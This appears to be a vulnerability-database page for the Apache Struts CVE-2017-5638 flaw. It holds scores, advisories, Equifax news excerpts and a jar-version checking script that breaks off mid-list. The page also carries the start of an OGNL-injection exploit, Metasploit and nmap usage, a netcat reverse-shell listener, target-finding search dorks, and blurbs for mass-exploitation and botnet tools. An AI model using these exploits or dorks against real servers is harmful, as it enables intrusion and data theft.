CVE-2017-5638

Published: 11/03/2017 Updated: 04/03/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The Jakarta Multipart parser in Apache Struts 2 2.3.x prior to 2.3.32 and 2.5.x prior to 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

Affected Products

Vendor: Apache
Product: Struts
Versions: 2.3.5, 2.3.6, 2.3.7, 2.3.8, 2.3.9, 2.3.10, 2.3.11, 2.3.12, 2.3.13, 2.3.14, 2.3.14.1, 2.3.14.2, 2.3.14.3, 2.3.15, 2.3.15.1, 2.3.15.2, 2.3.15.3, 2.3.16, 2.3.16.1, 2.3.16.2, 2.3.16.3, 2.3.17, 2.3.19, 2.3.20, 2.3.20.1, 2.3.20.2, 2.3.20.3, 2.3.21, 2.3.22, 2.3.23, 2.3.24, 2.3.24.1, 2.3.24.2, 2.3.24.3, 2.3.25, 2.3.26, 2.3.27, 2.3.28, 2.3.28.1, 2.3.29, 2.3.30, 2.3.31, 2.5, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.5.6, 2.5.7, 2.5.8, 2.5.9, 2.5.10

Vendor Advisories

On March 6, 2017, Apache disclosed a vulnerability in the Jakarta Multipart parser used in Apache Struts2 that could allow an attacker to execute commands remotely on a targeted system by using a crafted Content-Type, Content-Disposition, or Content-Length value. This vulnerability has been assigned CVE-ID CVE-2017-5638. This advisory is availabl ...
Remote code execution vulnerability via Apache Struts 2. Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product ...
A flaw was reported in Apache Struts 2 that could allow an attacker to perform remote code execution with a malicious Content-Type value ...

Exploits

#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib

def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')"
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.Action ...
##
# This module requires Metasploit: metasploit.com/download
# Current source: github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update ...

Mailing Lists

Apache Struts 2 versions 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 remote code execution exploit that provides a reverse shell ...

Nmap Scripts

http-vuln-cve2017-5638

Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).

nmap -p <port> --script http-vuln-cve2017-5638 <target>

PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2017-5638:
|   VULNERABLE
|   Apache Struts Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-5638
|
|     Disclosure date: 2017-03-07
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
|       https://cwiki.apache.org/confluence/display/WW/S2-045
|_      http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html

Metasploit Modules

Apache Struts Jakarta Multipart Parser OGNL Injection

This module exploits a remote code execution vulnerability in Apache Struts versions 2.3.5 - 2.3.31 and 2.5 - 2.5.10. Remote code execution can be performed via the HTTP Content-Type header. Native payloads will be converted to executables and dropped in the server's temp directory. If this fails, try a cmd/* payload, which won't have to write to the disk.

msf > use exploit/multi/http/struts2_content_type_ognl
msf exploit(struts2_content_type_ognl) > show targets
    ...targets...
msf exploit(struts2_content_type_ognl) > set TARGET <target-id>
msf exploit(struts2_content_type_ognl) > show options
    ...show and set options...
msf exploit(struts2_content_type_ognl) > exploit

Github Repositories

apache-struts2-CVE-2017-5638 Demo Application and Exploit. Sample Apache Struts2 App Struts2-showcase: mvnrepository.com/artifact/org.apache.struts/struts2-showcase/2.3.12. Exploit Reference: github.com/rapid7/metasploit-framework/issues/8064

cve-2017-5638 cve-2017-5638 Vulnerable site sample. This project aims to demonstrate the CVE-2017-5638 exploitation for educational purposes. For more information, see cwiki.apache.org/confluence/display/WW/S2-045. Legal Disclaimer: This project is made for educational and ethical testing purposes only. Attacking targets without prior mutual consent is illegal. It is the e

CVE-2017-5638 CVE-2017-5638 (PoC Exploits)

cve-2017-5638 Reference_1 Reference_2 Reference_3 Reference_4

CVE-2017-5638 | Struts s2-045. Description: It is possible to perform an RCE attack with a malicious Content-Type value. If the Content-Type value isn't valid, an exception is thrown which is then used to display an error message to a user. Affected versions: Struts 2.3.5 to Struts 2.3.31, Struts 2.5 to Struts 2.5.10. Exploitation. Remediation: To remediate this issue, update the affec

Apache-Struts-CVE-2017-5638-RCE-Mass-Scanner

struts-rce-cve-2017-5638 Struts-RCE CVE-2017-5638. This is a modified exploit that creates a webshell and provides a bash/cmd-like interface to interact with the webshell in the console.

Modded-Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638-AUTO-EXPLOITER

CVE-2017-5638 Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution - Shell Script. The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Ty

Struts-Apache-ExploitPack These are just some scripts which you can use to detect and exploit the Apache Struts vulnerability (CVE-2017-5638). There is a MassScanner and an Exploiter; you can use the scanner to mass-scan a list of URLs and then exploit them with the Exploiter. The Exploiter will run arbitrary shell commands on the vulnerable server.

CVE-2017-5638 struts.apache.org/docs/s2-016.html cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017 Metasploit Framework exploit module for the Apache Struts Content-Type exploit. Have not tested against a Windows server but tested against a Linux server using the payload generic/shell_bind_tcp.

StrutsShell Apache Struts (CVE-2017-5638) Shell. Introduction: The "LowNoiseHG (LNHG) Struts Shell" ("StrutsShell" from now on) was conceived in March 2017 after realizing the usefulness of not having to exploit Apache Struts CVE-2017-5638 manually (HTTP GET requests by hand) and after realizing the respective Metasploit module for this vulnerability did not w

POC Exploit for CVE-2017-5638. Only use this exploit on systems you own or have explicit rights to test. Installation: If you already have Go installed on your computer, go get is the way to go: go get github.com/Greynad/struts2-jakarta-inject. Usage: Single command execution: struts2-jakarta-inject -u <url> -c 'id'. Pseudo-interactive shell: struts2-jakarta-inje

Apache-Struts An exploit for Apache Struts CVE-2017-5638. Usage: Testing a single URL: python struts-pwn.py --url 'example.com/struts2-showcase/index.action' -c 'id'. Nmap recon: nmap -p <port> --script http-vuln-cve2017-5638 <target>. Testing a list of URLs: python struts-pwn.py --list 'urls.txt' -c 'id

CVE-2017-5638 PoC Code in Python | DORK: ext:action. Example PoC Code for CVE-2017-5638 | Apache Struts Exploit | DORK: ext:action. USAGE: python struts.py victimsite dir. The initial Python script that was posted didn't correctly format the Content-Type header. I recoded the Content-Type header to properly format Content-Type:%20{Exploit}. I also added a logging and

~ ExpStruts ExpStruts is a PHP-based mass exploiter for CVE-2017-5638. Screenshot(s). Requirements: ~ Python3 for MakMan's Google Scraper ~ Abk Khan [ @asystolik ]

struts2_cve-2017-5638 This is a sort of Java port of the Python exploit at www.exploit-db.com/exploits/41570/. This software is written to have no external dependencies. DISCLAIMER: This tool is intended for security engineers and appsec guys for security assessments. Please use this tool responsibly. I do not take responsibility for the way in which anyone uses thi

struts-pwn An exploit for Apache Struts CVE-2017-5638 Usage Testing a single URL python struts-pwnpy --url 'examplecom/struts2-showcase/indexaction' -c 'id' Testing a list of URLs python struts-pwnpy --list 'urlstxt' -c 'id' Checking if the vulnerability exists against a single URL python struts-pwnpy --check --url 'h

Apache-Struts-CVE-2017-5638 Python script to test servers for the Apache Struts vulnerability (CVE-2017-5638).

test_struts2_vulnerability_CVE-2017-5638_in_MAC_OS_X test struts2 vulnerability CVE-2017-5638 in Mac OS X
### download test web app and run it in tomcat
# install tomcat
brew install tomcat
# confirm where tomcat is installed
ls -lF `which catalina`
# confirm tomcat home dir
ls -lF /usr/local/Cellar/tomcat/8.5.11/libexec
# create web app "struts2" in webapps of tomcat

CVE-2017-5638 CVE: 2017-5638 in different formats. Most of them will require you to enter the URL and you might want to change the command. Please issue pull requests if you can make it so you can enter a URL and command! PHP - Example: localhost/2017-5638.php?url=TARGET&cmd=command. XMLHttpRequest - CVE-2017-5638.js -- will require Access-Control-Allow-Origin on tar

Apache Struts2 Vulnerability | CVE-2017-5638 | Version 2.5. Disclaimer: This is meant for educational and research purposes only. I do not authorize or endorse any illegal or unethical use of this project's contents or information. Instructions: To run the webapp: java -jar ms-cybersecurity-1.jar (uses embedded Tomcat, Java 1.8); the webapp boots on port 8080 by default (loca

S2-045 RCE Usage: python CVE-2017-5638-S2-045.py url. The script's functionality is limited to command execution; an infinite while loop handles the interactive mode for executing multiple commands.

S2-045 CVE-2017-5638 Exploit. Remediation: Detection method: check the struts-core-x.x.jar under the /WEB-INF/lib/ directory of the web directory; if its version is between Struts 2.3.5 and Struts 2.3.31 or between Struts 2.5 and Struts 2.5.10, the vulnerability is present. Update to Struts 2.3.32 or Struts 2.5.10.1, or use a third-party protective device for protection.

cve-2017-5638

remote-code-execution-sample Example shows how to use the Java Security Manager to prevent remote code execution exploits. Intro to the Problem. The Problem: Equifax breach, 143 million Americans' personal info, including names, addresses, dates of birth and SSNs, compromised. Only a veneer of security was in place. The Exploit: The vulnerability Apache Struts, CVE-2017

S2-045 Struts2 S2-045 Vulnerability environment

CVE-2017-5638 Apache Struts2 Example PoC Exploit PHP Code for CVE-2017-5638. Usage: php exploit.php "127.0.0.1:8080/example/index.action" "command" ** USE AT YOUR OWN RISK **

Stutsfi An exploit for CVE-2017-5638, a Remote Code Execution (RCE) vulnerability in Apache Struts 2.

#Struts2 Content-Disposition filename null-byte variant of CVE-2017-5638. Struts2 Security Bulletin S2-046. A null byte (\x00) in a request's Content-Disposition header filename field can trigger an InvalidFileNameException with the same (client-controlled) filename string in the exception message, which can be used to trigger OGNL evaluation during error handling. Note tha

#Tool to exploit security bug CVE-2017-5638. #Install Dependencies: easy_install requests; easy_install termcolor. Contact: To get in touch with me, @saamux, with any question or suggestion.

strutser This program checks for CVE-2017-5638. Usage:
Usage of ./strutser:
  -c, --concurrency int   Concurrent HTTP requests (default 10)
  -f, --file string       File containing targets
  -p, --ports intSlice    Ports to check (default [80])
  -t, --timeout int       Timeout on HTTP requests (default 15)
Tips: For multiple ports, use the --ports argum

Common-Vulnerability-and-Exploit-5638 This is the Apache Struts CVE-2017-5638 Struts 2 vulnerability, the same CVE that resulted in the Equifax database breach. A write-up on how to apply and patch against this exploit.

S2-046_POC Usage: ./s2_046.sh [url]  ./s2_045.sh [url]  Sample: chmod +x ./s2_046.sh; ./s2_046.sh 172.16.152.135/index.action  OUTPUT: ================HTTP GET Method================ uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023 uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_j

CVE-2017-5638 Apache Struts 2.0 RCE vulnerability. This is a script to exploit CVE-2017-5638; it allows an attacker to inject OS commands into a web application through the Content-Type header. Apache Struts 2 is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-

CVE-2017-5638 Table of Contents: Overview, Dependencies, Usage. Overview: This project is a proof-of-concept for the Apache Struts vulnerability. The goal was to create software that can generate and test random IPs for the vulnerability described above. Use this project at your own risk and for educational purposes only. Dependencies: cURL. cURL is used to send the crafted header t

CVE-2017-5638 This script is intended to validate the Apache Struts 2 vulnerability (CVE-2017-5638), AKA Struts-Shock. This is completely harmless as it does not inject any malicious payload; it only injects an HTTP header named 'STRUTS2-VALIDATION' in order to validate whether the target is vulnerable. Because of its multithread capability, it's able to run 25k+ appli

#Struts2 S2-045 (CVE-2017-5638) Exp Tools. #Exp Function: Command Execute, Get Target Website's Physical Path, File Upload, Getshell, Default Webshell For Chopper. Support HTTP/HTTPS. Support URL With Any Port. Note: Default Webshell's Password is s2045@exp. #Notice: The Project Is Intended For Educational/Research Purposes. Mail: flyteas@gmail.com

Exploit Demo for CVE-2017-5638. Completely based on github.com/piesecurity/apache-struts2-CVE-2017-5638. Usage: Pre-requisites: have python, docker, maven and a jdk installed. Clone this repo; run mvn clean package in project root; run docker build -t hack; run docker run -d -p 8080:8080 hack; once the container comes online, verify by running in browser. To begin testing RCE

strutszeiro Telegram Bot to manage botnets created with the Struts vulnerability (CVE-2017-5638). #Dependencies: pip install -r requeriments.txt. #Config: Create a Telegram bot, save the API token in config/token.conf. Create a Telegram group, save the group id in config/group.conf. #Start: python strutszeiro.py. #Telegram Usage: /add url - test vulnerability and add the new server. /exploit

#CNVD-ID CNVD-2017-02474. Release date: 2017-03-07. Severity level: High (AV:N/AC:L/Au:N/C:C/I:C/A:C). Affected products: Apache struts >=2.3.5,<=2.3.31; Apache struts >=2.5,<=2.5.10. CVE ID: CVE-2017-5638. Vulnerability description: Apache Struts is an open-source framework for building enterprise-level Java web applications. Apache Struts2 has an S2-045 remote code execution vulnerability. A remote attacker

Strutsy Strutsy - Mass exploitation of the Apache Struts (CVE-2017-5638) vulnerability. Includes blind and time-based code injection techniques which significantly reduce false negatives. Other features include mass URL imports to scan multiple targets in one go. Usage: python strutsy.py urls.txt windows/linux/default ip-address. All parameters are required. urls.txt - file contai

I extended Scott Campbell's script further, made it more complicated :) While "HTTP_StrutsAttack" will stop 100% of the recon, there was still a minuscule chance that if a scanner hits a vulnerable system, even though we'd block the scanner, the vulnerable system might still do the wget included in the HTTP request and execute the malware. Since we aren't blo

OgnlContentTypeRejectorValva This is a Valve for Tomcat 7 to block the Struts 2 Remote Code Execution vulnerability (CVE-2017-5638).

Struts2Shell An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug. Installation: $ npm install -g struts2shell. Installation as Library: $ npm install struts2shell. Command Line Options: -h, --help output usage information; -V, --version output the version number; -u, --url [target] URL to attack; -c, --cmd [command] Command to execute. Usage as Li

Apache-Struts-2-CVE-2017-5638-Exploit This exploit exploits the Apache Struts2 vulnerability (CVE-2017-5638), allowing us to execute commands remotely on the Apache server. How to use: $ sudo python Struts2_Shell001.py ******************************************* * [!] Exploit Apache Struts2 {*}DEMO * *******************************************

CVE-2017-5638

CVE-2017-5638 Google Dork : "site:com filetype:action"

apache-struts-v2-CVE-2017-5638 Working POC for CVE-2017-5638. This repo contains a working Python example demonstrating the RCE capabilities of CVE-2017-5638. Also included for reference is the Struts Showcase WAR file.

Apache Struts CVE-2017-5638 exploitation This simple web application is built with vulnerable Apache Struts 2.5.10 (CVE-2017-5638). It's vulnerable to RCE. Starting web application: To start the vulnerable web application, execute: mvn jetty:run. The application will be accessible on port 8012 by default. You can change it: mvn -Djetty.http.port=<port

cve-testing

Overview: Git repository for grey hat hacking talk. Agenda: What is a hacker; What is grey hat hacking; Why is it important (survey of Fortune 500 companies); Talk about the Equifax hack (link); Run the Equifax hack; Show them the code; Walk through what it does; Run the exploit against a server; Show the results; Decode the passwords; Talk about how it was executed and the fallout for Equifax

Strutshock Usage: strutshock example.com/index.action

S2-Reaper This project is used to collect vulnerable URLs affected by Struts2 S2-045 from Google search results. Usage: python reaper.py. About: reaper.py will run a Google search crawler with keywords defined in crawler.conf to find vulnerable URLs. crawler.conf: base_url : the basic Google search URL; keyword : e.g. site:gov ext:action; expect_num : expect search res

CVEPoC's List of software CVEs with some "testing code" alongside a "testable" real web app implementing these vulnerabilities. Command Injections: C 1 CVE-2016-3714 ==> ImageTragick RCE. Argument Injections: PHP 1 CVE-2016-10033 ==> PHPMailer + WordPress 4.6 RCE. Code Injections: JAVA 1 S2-046_CVE-2017-5638 ==> Stru

Struts2-045-Exp Struts2-045 exploitation script, for testing use only. usage: python3 struts2-045-exp.py url cmd

A Vulnerable Apache Struts Application. Confirmed Vulnerabilities (CVE | Description | URL): 2017-5638 | Remote Command Vulnerability in Apache Struts | cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638. Requirements: Vagrant, VirtualBox, SearchSploit (Optional). Setup: $ git clone github.com/evolvesecurity/vuln-struts2-vm.git  $ cd vuln-struts2-vm  Build Virtual M

CVE-2017-5638 Apache Struts 2 Vulnerability Remote Code Execution, reverse shell from target. Author: anarc0der - github.com/anarcoder. Tested with tomcat8. Install tomcat8. Deploy WAR file: github.com/nixawk/labs/tree/master/CVE-2017-5638. Ex: Open: $ nc -lnvp 4444  python2 struntsrce.py --target=localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --

Vulnerable Struts2 application. Requirements: Maven (maven.apache.org), Struts <= 2.5.10. CVE-2017-5638 - Apache Struts 2 Multipart form RCE. Requirements: Locate a URL that issues a multipart form POST. Getting Started: The application / server can be started with the following Maven command: mvn jetty:run. Run the exploit (www.exploit-db.com/exploits/41570

check_struts This project has been created following the 2017 Equifax exploit. The check_struts.sh script aims at retrieving any Apache Struts library version and location found and/or loaded on the system. It can be run directly on a server, or with the provided Ansible playbook, to handle several servers. Possible Outputs: "Libs path and versions loaded on the system:

DevSecOps Pipeline Demo. Requirements: This demo uses VirtualBox to deploy a local GitLab instance and configure it to run a DevSecOps pipeline demo. This demonstrates a DevSecOps pipeline using an application that contains the Struts2 vulnerability (CVE-2017-5638) made famous in the Equifax breach. Pre-requisites: VirtualBox, Vagrant, Python. You will also need the Vagrant Host

DEDSECURITYTOOLS v2.01, the new version of the pentest tools from DED Security. You'll love the tools in the dedsecurity.py program: brutexss, scannernmap, Apache-Struts-2-CVE-2017-5638-Exploit-, drawing tools; it can also be used with python3. scannernmap works with python3: pip3 install python-nmap. brutexss works with python2: pip install mechanize, pip i

StrutsExp Usage: strutsexp example.com/index.action

Commandline Emulator | CVE-2017-5638. Disclaimer: This is meant for educational and research purposes only. I do not authorize or endorse any illegal or unethical use of this project's contents or information. Proof-of-concept command line emulator to deliver payloads for CVE-2017-5638. Instructions: Run: java -jar Send.jar. Url: localhost/Webapp/action. Supports most ba

CVE-shellshock Common Vulnerabilities and Exposures. Big CVEs in the last 5 years: CVE-2014-0160 - Heartbleed. The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication se

Penetration Testing Methodology. Penetration testing process, methods and real-world attack collections, framework and testing guide: OWASP - Open Web Application Security Project; PTES - Penetration Testing Execution Standard; PCI DSS PCI Penetration Testing Guide; PTF - Penetration Testing Framework; OSSTMM - Open Source Security Testing Methodology Manual. Pre Engagement VMware

Apache-Struts-v3 The script combines 3 RCE vulnerabilities in Apache Struts and can also create a server shell. SHELL: php function finished :), jsp function in development. CVE ADD: CVE-2013-2251 'action:', 'redirect:' and 'redirectAction'; CVE-2017-5638 Content-Type; CVE-2018-11776 'redirect:

FwdSh3ll FwdSh3ll is a tiny open source web-payload oriented exploitation framework for crafting forward shells. What is a forward shell? Have you ever been caught in a situation when, looking for an approach to a CTF box, you discover an RCE vulnerability in a web app but despite that you can't get a reverse shell no matter how hard you try due to strictly filtered out

Apache-Struts-v3 The script combines 3 RCE vulnerabilities in Apache Struts and can also create a server shell. SHELL: php finished, jsp in progress. CVE ADD: CVE-2013-2251 'action:', 'redirect:' and 'redirectAction'; CVE-2017-5638 Content-Type; CVE-2018-11776 'redirect:' and 'redirectAction

CVE-2018-11776-Python-PoC hook-s3c (github.com/hook-s3c), @hook_s3c on Twitter. Working Python test and PoC for CVE-2018-11776, originally appearing on github.com/hook-s3c/CVE-2018-11776-Python-PoC. What's going on? Man Yue Mo from Semmle has disclosed a Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request. Versions affected are 2

JexBoss - JBoss (and other Java Deserialization Vulnerabilities) verify and EXploitation Tool. JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and other Java platforms, frameworks, applications, etc. Requirements: Python >= 2.7.x, urllib3, ipaddress. Installation on Linux/Mac: To install the latest version of JexBoss, please use the

Payloads All The Things A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques! I <3 pull requests :) You can also contribute with a beer IRL or with buymeacoffee.com. Every section contains: README.md - vulnerability description and how to exploit it; Intruders - a set of files to give to Burp Intrude

cve-2014-0050 CVE-2014-0050 Vulnerable site sample. This project aims to demonstrate the CVE-2014-0050 exploitation for educational purposes. For more information, see: www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2014-0050--Exploit-with-Boundaries,-Loops-without-Boundaries/ github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/http/apache

ABOUT: Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. DEMO VIDEO: FEATURES: Automatically collects basic recon (i.e. whois, ping, DNS, etc.); Automatically launches Google hacking queries against a target domain; Automatically enumerates open ports via Nmap port scanning; Automatically brute forces sub-doma

Environment: Requires Java 1.8+ and Maven 3.x+. Usage: 1. Download: git clone git.oschina.net/0d/Struts2_bugs.git 2. View remote branches: git branch -a 3. Switch to a branch: git checkout <branch-name>, e.g. git checkout S2-046 4. Package: mvn clean package 5. Deploy in Tomcat: copy the Struts2-046.war generated under \target to Tomcat's webapps directory, then start Tomcat and visit 127.0.0

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for professional penetration testers, bug bounty researchers and corporate security teams to manage large environments and pentest scopes. For more information regarding

ActiveScan++ ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers: potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding); Edge Side Includes; XML input handling; suspicious input transformation (e.g.

Payloads All The Things A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques! I <3 pull requests :) You can also contribute with a beer IRL or with buymeacoffee.com. Every section contains the following files (you can use the _template_vuln folder to create a new chapter): README.md - vulnerability d

Alien-Framework ========================================================================= Version: shellmaster - v4. More CVE Exploits. Install and use: [1] git clone github.com/colorblindpentester/Alien-Framework [2] cd Alien-Framework [3] python3 alien-framework.py. Features: [1] Completely automatic (No requirements.txt) [2] Easy to use [3] For Kali Linux and Parrot

Recent Articles

Beapy: Cryptojacking Worm Hits Enterprises in China
Symantec Threat Intelligence Blog • Security Response Attack Investigation Team • 24 Apr 2019

Cryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.

Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. Beapy act...

Hackers latch onto new Apache Struts megavuln to mine cryptocurrency
The Register • John Leyden • 30 Aug 2018

Underground forums alight with Struts chat, we hear

A recently uncovered critical vulnerability in Apache Struts is already being exploited in the wild.
Threat intel firm Volexity has warned that hackers are abusing the CVE-2018-11776 vuln to attack systems running Apache Struts 2, a popular open-source framework for developing applications in Java. Specifically, some nasty characters have abused the flaw while trying to install the CNRig cryptocurrency miner, researchers said.
The vulnerability appears to be easier to exploit than th...

MassMiner Takes a Kitchen-Sink Approach to Cryptomining
Threatpost • Tara Seals • 03 May 2018

Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin’-somethin’ to the mix. It targets Windows servers with a variety of recent and well-known exploits – all within a single executable.
In fact, MassMiner uses a veritable cornucopia of attacks: The EternalBlue National Security Agency hacking tool (CVE-2017-0143), which it uses to install DoublePulsar and the Gh0st ...

Equifax Adds 2.4 Million More People to List of Those Impacted By 2017 Breach
Threatpost • Lindsey O'Donnell • 02 Mar 2018

Equifax said that an additional 2.4 million Americans have had their personal data stolen as part of the company’s massive 2017 data breach, including their names and some of their driver’s license information.
The additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.
The consumer credit reporting agency on Thursday said that as part of an “ongoing analysis”...

IRS tax bods tell Americans to chill out about Equifax
The Register • Richard Chirgwin • 18 Oct 2017

Your personal data was probably already in crims' hands

The United States Internal Revenue Service has said that citizens affected by the Equifax breach need not panic, because it probably didn't reveal anything that hasn't already been stolen and the agency has tooled up to deal with fraudulent tax claims.
Commissioner John Koskinen, discussing whether the breach would interfere with tax collection, told journalists “a significant percent of those taxpayers already had their information in the hands of criminals”, according to a report of ...

Oracle Patches 250 Bugs in Quarterly Critical Patch Update
Threatpost • Tom Spring • 17 Oct 2017

Oracle patched 250 vulnerabilities across hundreds of different products as part of its quarterly Critical Patch Update released today.
Rounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.
Of the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle’s popular Oracle E-Business Suite (EBS).
“W...

Sole Equifax security worker at fault for failed patch, says former CEO
The Register • Simon Sharwood • 04 Oct 2017

Someone failed to order the patch. If it was you, c'mere, have a hug. And a new identity

Recently-and-forcibly-retired Equifax CEO Rick Smith has laid the blame for his credit-check biz's IT security breach on a single member of the company's security team.
In testimony on Tuesday before a US House subcommittee on consumer protection, Smith explained that Equifax has a protocol whereby news of important software patches is communicated to the appropriate people within a certain time. When details of security vulnerability CVE-2017-5638 landed in March 2017, bearing bad news ab...

Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies
Threatpost • Chris Brook • 03 Oct 2017

Equifax, the credit agency behind this summer’s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.
Paulino do Rego Barros, Jr., the company’s interim CEO, announced Monday that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.
Equifax initially called its investigation around the breach “substantially complete,” but said it was still carrying out furth...

Equifax couldn't find or patch vulnerable Struts implementations
The Register • Richard Chirgwin • 02 Oct 2017

Ex-CEO says company stayed silent about hack to stop crims piling on with more attacks

Equifax was just as much of a trash-fire as it looked: the company saw the Apache Struts 2 vulnerability warning, failed to patch its systems, and held back a public announcement for weeks for fear of “copycat” attacks.
Those Infosec for Absolute Dummies tips were made official by ex-CEO Richard Smith, by way of evidence published by a US House committee ahead of his in-person appearance Tuesday.
Smith's written statement [PDF] to the House Committee on Energy and Commerce says t...

Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug
Threatpost • Chris Brook • 26 Sep 2017

Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system, late last week.
The Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built using the Struts framework and its REST communication plugin, earlier this month.
Scores of Oracle products, roughly two dozen in total, are aff...

Equifax's disastrous Struts patching blunder: THOUSANDS of other orgs did it too
The Register • John Leyden • 20 Sep 2017

Those are just the ones known to have downloaded outdated versions

Thousands of companies may be susceptible to the same type of hack that recently struck Equifax.
The Equifax breach was the result of a vulnerable Apache Struts component. Software automation vendor Sonatype warns that 3,054 organisations downloaded the same Struts2 component exploited in the Equifax hack in the last 12 months. The affected version of Struts2 was publicly disclosed as vulnerable (CVE-2017-5638) on March 10, and was subsequently exploited at Equifax between May and late Jul...
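Finding the component Sonatype is counting means checking which struts2-core build each deployment actually ships. As an added example (not Sonatype's, Equifax's or the Struts project's own code), the Python below classifies struts2-core jar versions against the first fixed release in each affected line named in the advisory summary, 2.3.32 and 2.5.10.1, and walks a deployment tree for such jars. The sample paths are constructed; the regular expression on the jar file name is an assumption that works for the stock Maven artifact name and will miss renamed or shaded jars.

```python
import os
import re
from typing import Iterable, Iterator, List, Optional, Tuple

# First fixed release in each affected line, from the advisory summary:
# 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 are affected.
FIXED = {(2, 3): (2, 3, 32), (2, 5): (2, 5, 10, 1)}

# Stock Maven artifact name, e.g. struts2-core-2.5.10.1.jar (assumption:
# renamed or shaded jars will not match and need a manifest check instead).
JAR_NAME = re.compile(r"^struts2-core-(\d+(?:\.\d+)+)\.jar$")


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.5.10.1' -> (2, 5, 10, 1).  Tuples compare element by element and a
    shorter prefix sorts first, so (2, 5, 10) < (2, 5, 10, 1): 2.5.10 is
    affected while the point release that fixed it is not."""
    return tuple(int(part) for part in text.split("."))


def is_affected(version: str) -> Optional[bool]:
    """True if the version is in an affected range, False if it is at or past
    the fix, None if it is outside the 2.3.x / 2.5.x lines the advisory rates
    (older 2.x lines are not assessed here and need a manual look)."""
    v = parse_version(version)
    fixed = FIXED.get(v[:2])
    if fixed is None:
        return None
    return v < fixed


def classify_paths(paths: Iterable[str]) -> List[Tuple[str, str, Optional[bool]]]:
    """(path, version, affected) for every struts2-core jar among the paths."""
    rows = []
    for path in paths:
        m = JAR_NAME.match(os.path.basename(path))
        if m:
            rows.append((path, m.group(1), is_affected(m.group(1))))
    return rows


def scan_tree(root: str) -> List[Tuple[str, str, Optional[bool]]]:
    """Walk a deployment root (e.g. a Tomcat webapps directory) and classify
    each struts2-core jar found under it."""
    def walk() -> Iterator[str]:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                yield os.path.join(dirpath, name)
    return classify_paths(walk())


# Constructed sample inventory, not a real host.
SAMPLE_PATHS = [
    "/opt/tomcat/webapps/app/WEB-INF/lib/struts2-core-2.3.31.jar",
    "/opt/tomcat/webapps/app/WEB-INF/lib/commons-fileupload-1.3.2.jar",
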